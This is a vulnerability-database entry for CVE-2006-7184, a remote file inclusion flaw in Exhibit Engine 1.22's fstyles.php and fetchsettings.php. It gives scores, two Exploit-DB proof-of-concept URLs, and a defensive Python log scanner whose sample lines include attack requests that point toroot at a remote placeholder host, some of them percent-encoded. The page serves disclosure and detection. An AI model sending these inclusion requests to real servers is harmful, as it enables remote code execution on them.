CVE-2006-7184
Published 2007-03-30
Priority: P4 33 · medium · 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.93% (77.5th percentile)
Multiple PHP remote file inclusion vulnerabilities in Exhibit Engine (EE) 1.22, and possibly earlier, allow remote attackers to execute arbitrary PHP code via a URL in the toroot parameter to (1) fetchsettings.php or (2) fstyles.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
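A log check for the request pattern in the description above, added here as an example (it is not part of the CVE record or of any Exploit-DB entry): it flags requests to `fetchsettings.php` or `fstyles.php` whose `toroot` value decodes to a URL, including percent-encoded and double-encoded forms. The combined access-log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Scripts and parameter named in the advisory.
TARGET_SCRIPTS = {"fetchsettings.php", "fstyles.php"}
PARAM = "toroot"
# A scheme prefix (http://, ftp://, php://, data:) or a protocol-relative //host value.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:(?://)?|//)", re.I)
# Request portion of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Constructed sample lines; addresses and host names are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Oct/2006:10:00:01 +0000] "GET /ee/fstyles.php?toroot=../ HTTP/1.1" 200 512',
    '192.0.2.44 - - [30/Oct/2006:10:00:07 +0000] "GET /ee/fstyles.php?toroot=http://host.example/inc.txt? HTTP/1.1" 200 90',
    '192.0.2.44 - - [30/Oct/2006:10:00:09 +0000] "GET /ee/fetchsettings.php?toroot=%2568ttp%253A%252F%252Fhost.example%252Finc HTTP/1.0" 200 90',
    '192.0.2.10 - - [30/Oct/2006:10:00:12 +0000] "GET /ee/index.php?toroot=http://host.example/ HTTP/1.1" 404 0',
]

def fully_unquote(value, max_rounds=3):
    """Undo repeated percent-encoding so %2568ttp:// is seen as http://."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_toroot(request_target):
    """Return the decoded toroot value if it looks like a URL, else None."""
    parts = urlsplit(request_target)
    if parts.path.rsplit("/", 1)[-1].lower() not in TARGET_SCRIPTS:
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() == PARAM:
            decoded = fully_unquote(value)  # parse_qsl already decoded once
            if REMOTE_RE.match(decoded):
                return decoded
    return None

def scan(lines):
    """Yield (line_number, decoded_value) for each flagged log line."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        hit = suspicious_toroot(m.group(1)) if m else None
        if hit:
            yield n, hit

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: toroot -> {value}")
```

A relative value such as `../` is not flagged, so the check only covers the URL-valued `toroot` described in the advisory.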
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| photography-on-the-net | exhibit_engine_2 | <= 1.22 | — |
No detection rules found.
Exploit-DB
Exhibit Engine 1.22 - 'fstyles.php?toroot' Remote File Inclusion
exploitdb·2006-10-30
---
source: https://www.securityfocus.com/bid/20793/info
Exhibit Engine Software is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Version 1.22 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/fstyles.php?toroot=shell
Exploit-DB
Exhibit Engine 1.22 - 'fetchsettings.php?toroot' Remote File Inclusion
exploitdb·2006-10-30
---
source: https://www.securityfocus.com/bid/20793/info
Exhibit Engine Software is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Version 1.22 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/fetchsettings.php?toroot=shell
No writeups or analysis indexed.
Published: 2007-03-30